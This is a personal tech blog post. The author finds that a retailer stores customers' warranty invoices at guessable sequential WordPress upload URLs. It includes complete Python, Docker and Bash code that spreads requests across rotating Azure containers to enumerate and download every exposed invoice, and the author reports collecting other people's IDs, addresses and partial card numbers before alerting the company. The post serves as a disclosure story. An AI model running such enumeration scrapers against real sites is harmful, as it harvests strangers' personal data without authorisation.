Shopping IL (AKA “Israeli Black Friday invented by Google”) came and went, and with it, a sizeable part of my income. I did only buy things I truly needed, like a new keyboard, chair, and well, a blender.

Why is this blender so special, then? Read more to find out, duh… I am nothing if not a glorious storyteller who works in tech.

Upon receiving the blender, I open the cardboard box in which the shipment arrived, and discover my invoice inside, with instructions on how to activate my warranty. Ok, cool. I navigate to the website, fill in the online form, and upload a picture of the invoice. A minute later, I receive an email, which goes something like this:

Hey Orel,
Thanks for activating your warranty with us!
...
blah blah blah
...
Here's a link to your invoice:
https://our-website.com/wp-content/uploads/2021/11/278192.jpg

“Hell naw”, I exclaimed. There’s no way they just randomly generated a name for the picture I uploaded (containing my ID number, phone number, full name and address), and just put it on their site. So I decided to check it out and see if this is indeed the case, and other people’s personal data has the potential of being compromised.

Since we’re sending a bunch of requests, I wanted to make things efficient, so I implemented the code by spinning a bunch of containers using Azure Container Instances, and based on each container’s hostname, they will be responsible for checking a certain range of numbers. I created a file share, and when mounted it on each container. Now, I didn’t want 30 containers to be running at the same time, so I created a bash script to spin up new containers and increment the number when a container exits.
Here’s the python code I put inside the containers (called map.py):

import os
import grequests

# Get container name based on given hostname (for example my-cont-1)
cont_name = os.environt['CONTAINER_HOSTNAME']
cont_number = cont_name.split('-')[-1]

# Container will be responsible for checking images 1000-1999, if its name is my-cont-1)
min_num = int(str(cont_number) + '000')
max_num = int(str(cont_number) + '999')+1

base_url = 'https://our-website.com/wp-content/uploads/2021/11'

# Create the list based on min_num and max_num
numbers_to_check = [number for number in range(min_num, max_num)]

# Map the requests and output results to screen, as well as log them as found/not found
current_requests = (grequests.get(f'{base_url}/{k}.jpg', stream=False) for k in numbers_to_check)
results = grequests.imap(current_requests, size=4)
for r in results:
    if r.status_code == 200:
        with open(f'/mnt/cloudfs/valid_invoices_{cont_name}.txt', 'a') as f: f.write(f'{r.url}\n')
        filename=r.url.split('/')[-1]
        with open(f'/mnt/cloudfs/images/{filename}', 'wb') as f: f.write(r.content)
    else:
        with open(f'/mnt/cloudfs/invalid_invoices_{cont_name}.txt', 'a') as f: f.write(f'{r.url}\n')
    print(r.url + ": " + str(r.status_code))

Here’s the Dockerfile:

FROM python

WORKDIR /opt/myimage

COPY ./map.py .

RUN pip install grequests

CMD ["python3", "./map.py"]

And here’s the script that rotates containers when they are done (Which I set as a cronjob):

#!/bin/bash

# Name of Resource Group in Azure
ACI_PERS_RESOURCE_GROUP=my-aci-rg

# Name of Storage Account in Azure
ACI_PERS_STORAGE_ACCOUNT_NAME=imagemapperstorage

# Name of File Share in Azure
ACI_PERS_SHARE_NAME=cloudfs

# Prefix for container name
CONTAINER_NAME_PREFIX=invoice-mapper

# Get currently running containers
CURRENT_CONTAINERS=($(az container list -g $ACI_PERS_RESOURCE_GROUP --query "[].name" -o tsv))

# Get storage account key for mounting the file share on the containers
STORAGE_KEY=$(az storage account keys list --resource-group $ACI_PERS_RESOURCE_GROUP --account-name $ACI_PERS_STORAGE_ACCOUNT_NAME --query "[0].value" --output tsv)


COCURRENT_CONTAINERS=6
MAX_CONTAINER_NUMBER=9999999

# Create function for creating containers
# USAGE: create_container <name>
create_container () {
    cont_name=$1
    az container create \
    --resource-group $ACI_PERS_RESOURCE_GROUP \
    --name $cont_name \
    --image mycontainerimage:mytag \
    --dns-name-label $cont_name \
    --azure-file-volume-account-name $ACI_PERS_STORAGE_ACCOUNT_NAME \
    --azure-file-volume-account-key $STORAGE_KEY \
    --azure-file-volume-share-name $ACI_PERS_SHARE_NAME \
    --azure-file-volume-mount-path /mnt/cloudfs \
    --environment-variables CONTAINER_HOSTNAME=$cont_name \
    --restart-policy Never 1> /dev/null
}

# Create function for deleting containers
# USAGE: delete_container <name>
delete_container () {
    cont_name=$1
    az container delete \
        --resource-group $ACI_PERS_RESOURCE_GROUP \
        --name $cont_name \
        --yes 1> /dev/null
}


# Set CURRENT_COUNTER to highest container number
CURRENT_COUNTER=-1
for i in ${CURRENT_CONTAINERS[@]}; do
    number=$(echo $i | cut -d '-' -f3)
    if [[ $number > $CURRENT_COUNTER ]]; then
        CURRENT_COUNTER=$number
    fi
done

# Create new containers if number of containers is below COCURRENT_CONTAINERS
echo "${#CURRENT_CONTAINERS[@]} containers currently running"
if [[ ${#CURRENT_CONTAINERS[@]} < COCURRENT_CONTAINERS ]]; then
    MISSING_CONTAINERS=$[COCURRENT_CONTAINERS-${#CURRENT_CONTAINERS[@]}]
    NUMBER_TO_COUNT_TO=$[MISSING_CONTAINERS+CURRENT_COUNTER]
    CURRENT_COUNTER=$[CURRENT_COUNTER+1]
    for i in $(seq $CURRENT_COUNTER $NUMBER_TO_COUNT_TO); do
        echo "Creating container $CONTAINER_NAME_PREFIX-$i"
        create_container "$CONTAINER_NAME_PREFIX-$i"
        CURRENT_COUNTER=$i
    done
fi

# Check for terminated containers and rotate them
if [[ $CURRENT_COUNTER < $MAX_CONTAINER_NUMBER ]]; then
    CURRENT_CONTAINERS=($(az container list -g $ACI_PERS_RESOURCE_GROUP --query "[].name" -o tsv))
    for CONTAINER in ${CURRENT_CONTAINERS[@]}; do
        CONTAINER_NAME=$CONTAINER
        CONTAINER_STATE=$(az container show --resource-group $ACI_PERS_RESOURCE_GROUP -n $CONTAINER_NAME --query "[containers[0].instanceView.currentState.state]" --output tsv)
        # Container state contains a trailing tab which we must get rid of
        #CONTAINER_STATE=${CONTAINER_STATE%?}
        # Split container name so we can extract number from it
        readarray -d - -t SPLIT_CONTAINER_NAME <<< $CONTAINER_NAME
        CONTAINER_NUMBER=${SPLIT_CONTAINER_NAME[-1]}
        if [[ $CONTAINER_STATE == "Running" ]]; then
            echo "$CONTAINER_NAME is up"
        else
            echo "$CONTAINER_NAME is $CONTAINER_STATE"
            echo "$CONTAINER_NAME --> $CONTAINER_NAME_PREFIX-$CURRENT_COUNTER"
            delete_container $CONTAINER_NAME && create_container "$CONTAINER_NAME_PREFIX-$CURRENT_COUNTER"
            CURRENT_COUNTER=$[CURRENT_COUNTER+1]
        fi
    done
fi

The Bash script was honestly, a bit complicated for me to make, but I learned a ton in the process, about how Bash arrays work, how to extract substrings. Considering I haven’t done a lot of Bash scripting in the past, I’m happy with the resulting code.

Well, unfortunately, I did find other people’s info – full names, addresses, 4 last digits of their credit cards, ID numbers and phone numbers. I quickly contacted the company which swiftly implemented a CAPTCHA powered by Cloudflare for all images, including non-existent ones (thus returning HTTP 403 for all requests).

About the Author

Orel Fichman

Tech Blogger, DevOps Engineer, and Microsoft Certified Trainer

No responses yet

Leave a Reply

Your email address will not be published. Required fields are marked *

Newsletter

Categories